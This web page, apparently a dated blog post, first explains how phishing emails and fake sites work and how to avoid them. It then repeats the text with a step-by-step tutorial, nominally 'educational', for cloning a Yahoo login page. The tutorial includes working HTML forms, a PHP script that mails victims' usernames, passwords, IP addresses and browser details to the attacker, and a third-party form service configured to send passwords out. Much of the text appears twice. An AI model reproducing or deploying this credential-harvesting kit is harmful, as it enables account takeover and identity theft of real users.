Phishing "Protect urself" Know What Hackers Do !
Phishing continues to be one of the most significant security threats facing Internet users. During 2007, scammers distributed millions of phishing scam emails that targeted many different entities. Phishing attacks are sure to continue in 2008 and scammers will use such attacks to steal money and identities from many new victims around the world. Armed with a little knowledge about how phishing scams work, however, you can ensure that you do not become one of these victims.
A phishing scam is one in which victims are tricked into providing personal information such as account numbers, passwords and credit card details to what they believe to be a legitimate company or organization. In order to carry out this trick, the scammers often create a "look-a-like" webpage that is designed to resemble the target company's official website. Typically, emails are used as "bait" in order to get the potential victim to visit the bogus website. The emails use various devious ruses to trick readers into clicking on the included links, thereby opening the bogus website. Information submitted on these bogus websites is harvested by the scammers and may then be used to steal funds from the user's accounts and/or steal the victim's identity.
Phishing scam emails are created to give the illusion that they have been sent by a legitimate institution. Emails may arrive in HTML format and include logos, styling, contact and copyright information virtually identical to those used by the targeted institution. To further create the illusion of legitimacy, some of the secondary links in these bogus emails may lead to the institution's genuine website. However, one or more of the hyperlinks featured in the body of the email will point to the fraudulent website.
Links in phishing scam messages are often disguised to make it appear that they lead to the genuine institution site. The sender address of the email may also be disguised in such a way that it appears to have originated from the targeted company. Because they are sent in bulk to many recipients, scam emails use generic greetings such as "Dear account holder" or "Dear [targeted institution] customer". If an institution needed to contact a customer about some aspect of his or her account, the contact email would address the customer by name.
Phishing scam emails use a variety of ruses to explain why it is necessary for recipients to provide the requested information. Often, the messages imply that urgent action on the part of the recipient is required. Some of the most common ruses are listed below. The scam emails may claim that:
This article focuses primarily on email based phishing. However, it should be noted that phishing attacks on social networking sites are also becoming more common. Scam messages may be posted as comments or via personal message systems on social networking sites such as Facebook and MySpace. The messages often contain seemingly innocent invitations to click an included link to view images or read member profiles. However, clicking links in these bogus messages will open a fake version of the social networking site's login page. Victims who login to the fake page will be inadvertently sending their login details to scammers who will then have complete access to their accounts.
Generally speaking, people become victims of phishing scams simply because they do not know how such scams operate. You can help by ensuring that friends and colleagues are aware of such scams and what to do about them. The power of such "word-of-mouth" education is substantial. You CAN make a difference by sharing your knowledge of phishing scams with other Internet users.
Rather than using the provided link in the email, you should copy the link and email it to the legitimate company or business, asking if the email is legitimate. If it is frudlante this could help shut down phisher faster.
Only use the address that you have used before, or start at your normal homepage.
Most companies require you to log in to a secure site. Look for the lock at the bottom of your browser and “https” in front of the Website address.
This Article Tells u what Hackers Do which is Known as Phishing, It is Completely Illegal never ever Try it.. This Article is meant for Educational Purpose !
This is how Bad Hackers make a fake login page(Completely Illegal) that will email you the name and password that is entered on that page.. To do this you will need some web language experiance.
First you will need to get a copy of the source code of the site. so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html. either way youl need a copy of the login.html on your desktop.
now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like
And they change them to
or save all the images and host them on your own image hosting account.
then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. you have to look through your login.html and find the section of code that creates the login boxs and delete it. On Yahoo login this is the part of the source that needs to be replaced.
Now, this can be replaced by one of two things. If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on. Using php require 2 files. the login.html and thanks.php To use php replace the previous login script shown above with the following html.
And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php
They Call the second script thanks.php This script will sendHackers yuor name, password, ip, operating system, and browser type to you in the email.
Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do. so this method can be hosted on a geocities account. You need to go to /http://www.response-o-matic.com and get thier free email script that can be dropped into any html.
youl need to alter the script for it to work. i dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the orriginal yahoo login code thats higlighted at the top of this page. its morning now and im tired lol.
This is the responcomatic code that you can drop over the login code on your login page. just enter your email
Where it says YOUR_EMAIL@DOMAIN.COM Hackers change that to the email They want the pass to be sent. . this isnt the finished script it still needs some work but its pretty much all done.
 Phishing scammers continue to find new victims all around the world |
A phishing scam is one in which victims are tricked into providing personal information such as account numbers, passwords and credit card details to what they believe to be a legitimate company or organization. In order to carry out this trick, the scammers often create a "look-a-like" webpage that is designed to resemble the target company's official website. Typically, emails are used as "bait" in order to get the potential victim to visit the bogus website. The emails use various devious ruses to trick readers into clicking on the included links, thereby opening the bogus website. Information submitted on these bogus websites is harvested by the scammers and may then be used to steal funds from the user's accounts and/or steal the victim's identity.
Phishing scam emails are created to give the illusion that they have been sent by a legitimate institution. Emails may arrive in HTML format and include logos, styling, contact and copyright information virtually identical to those used by the targeted institution. To further create the illusion of legitimacy, some of the secondary links in these bogus emails may lead to the institution's genuine website. However, one or more of the hyperlinks featured in the body of the email will point to the fraudulent website.
Links in phishing scam messages are often disguised to make it appear that they lead to the genuine institution site. The sender address of the email may also be disguised in such a way that it appears to have originated from the targeted company. Because they are sent in bulk to many recipients, scam emails use generic greetings such as "Dear account holder" or "Dear [targeted institution] customer". If an institution needed to contact a customer about some aspect of his or her account, the contact email would address the customer by name.
Phishing scam emails use a variety of ruses to explain why it is necessary for recipients to provide the requested information. Often, the messages imply that urgent action on the part of the recipient is required. Some of the most common ruses are listed below. The scam emails may claim that:
- The customer's account details need to be updated due to a software or security upgrade.
- The customer's account may be terminated if account details are not provided within a specified time frame.
- Suspect or fraudulent activity involving the user's account has been detected and the user must therefore provide information urgently.
- Routine or random security procedures require that the user verify his or her account by providing the requested information.
This article focuses primarily on email based phishing. However, it should be noted that phishing attacks on social networking sites are also becoming more common. Scam messages may be posted as comments or via personal message systems on social networking sites such as Facebook and MySpace. The messages often contain seemingly innocent invitations to click an included link to view images or read member profiles. However, clicking links in these bogus messages will open a fake version of the social networking site's login page. Victims who login to the fake page will be inadvertently sending their login details to scammers who will then have complete access to their accounts.
Generally speaking, people become victims of phishing scams simply because they do not know how such scams operate. You can help by ensuring that friends and colleagues are aware of such scams and what to do about them. The power of such "word-of-mouth" education is substantial. You CAN make a difference by sharing your knowledge of phishing scams with other Internet users.
Protect Yourself
Rather than using the provided link in the email, you should copy the link and email it to the legitimate company or business, asking if the email is legitimate. If it is frudlante this could help shut down phisher faster.
Only use the address that you have used before, or start at your normal homepage.
Most companies require you to log in to a secure site. Look for the lock at the bottom of your browser and “https” in front of the Website address.
Related Article : Spy Phishing
Know what Hackers Do !
This Article Tells u what Hackers Do which is Known as Phishing, It is Completely Illegal never ever Try it.. This Article is meant for Educational Purpose !
This is how Bad Hackers make a fake login page(Completely Illegal) that will email you the name and password that is entered on that page.. To do this you will need some web language experiance.
First you will need to get a copy of the source code of the site. so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html. either way youl need a copy of the login.html on your desktop.
now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like
Code: |
<img src=/pics/pic.jpg> |
And they change them to
Code: |
<img src=http://www.domain.com/pics/pic.jpg> |
or save all the images and host them on your own image hosting account.
then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. you have to look through your login.html and find the section of code that creates the login boxs and delete it. On Yahoo login this is the part of the source that needs to be replaced.
Code: |
<table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1"> Yahoo! ID: </font></td> <td><input name="login" size="17" value=""></td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td><input name="passwd" type="password" size="17" maxlength="32"></td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1"> |
Now, this can be replaced by one of two things. If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on. Using php require 2 files. the login.html and thanks.php To use php replace the previous login script shown above with the following html.
Code: |
<html> <form method="POST" action="thanks.php"> Yahoo! ID <input type="TEXT" name="name"> <br> Password <input type="PASSWORD" name="password"> <br> <input type="SUBMIT" name="Submit" value="Login"> </form> </html> |
And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php
Code: |
<script LANGUAGE="php"> $email = $HTTP_POST_VARS[email]; $mailto = "Your Email Goes Here"; $mailsubj = "Form submission"; $mailhead = "From: $emailn"; reset ($HTTP_POST_VARS); $mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:n"; while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $valn"; } mail($mailto, $mailsubj, $mailbody, $mailhead); </SCRIPT> |
They Call the second script thanks.php This script will sendHackers yuor name, password, ip, operating system, and browser type to you in the email.
Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do. so this method can be hosted on a geocities account. You need to go to /http://www.response-o-matic.com and get thier free email script that can be dropped into any html.
youl need to alter the script for it to work. i dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the orriginal yahoo login code thats higlighted at the top of this page. its morning now and im tired lol.
This is the responcomatic code that you can drop over the login code on your login page. just enter your email
| Code: |
<HTML> <BODY BGCOLOR="#FFFFFF"> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <H3><CENTER> <INPUT TYPE="hidden" NAME="your_email_address" VALUE="YOUR_EMAIL@DOMAIN.COM"> <INPUT TYPE="hidden" NAME="your_name" VALUE="password"> <INPUT TYPE="hidden" NAME="email_subject_line" VALUE="My Password"> <INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" NAME="thank_you_title" VALUE="You are being redirected"> <INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://www.yahoo.com"> <INPUT TYPE="hidden" NAME="return_link_name" VALUE="CLICK HERE"> <INPUT TYPE="hidden" NAME="background_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="active_link_color" VALUE="#FF0000"> </CENTER></H3> <H4> </H4> <BLOCKQUOTE><P><TABLE BORDER=0 CELLSPACING=0> <TR> <TD WIDTH=116> <b>Yahoo Name</b> </TD><TD> <INPUT TYPE="text" NAME="visitor_name" VALUE="" SIZE=20> </TD></TR> <TR> <TD WIDTH=116> <b>Password</b> </TD><TD> <INPUT TYPE="password" NAME="visitor_email_address" VALUE="" SIZE=20> </TD></TR> </TABLE></P> <BLOCKQUOTE><P><INPUT TYPE="submit" NAME=Submit" VALUE="Login"></P></BLOCKQUOTE> <P> </P> </FORM> </BODY> </HTML> |
Where it says YOUR_EMAIL@DOMAIN.COM Hackers change that to the email They want the pass to be sent. . this isnt the finished script it still needs some work but its pretty much all done.